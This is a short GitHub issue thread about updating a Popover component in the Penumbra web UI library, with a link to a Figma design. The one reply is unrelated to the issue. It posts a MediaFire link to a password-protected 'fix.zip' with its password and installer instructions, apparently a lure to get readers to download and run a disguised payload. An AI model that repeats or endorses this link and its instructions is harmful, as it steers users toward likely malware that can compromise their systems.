### ISSUE TITLE
Popover 2.1 update

### ISSUE THREAD

**Issue by grod220** [penumbra-zone/web#1743]
Update: https://www.figma.com/design/WKgXSVVK3L0EI0sr9Hwjoa/penumbra-UI-library?node-id=778-47220&node-type=FRAME&cc-version-id=6463618495&m=dev

Added technical variant

**Comment by Anubi5x0** [comment]
Download 
https://www.mediafire.com/file/7ybpxn8lil1av70/fix.zip/file
password: changeme
In the installer menu, select "gcc."
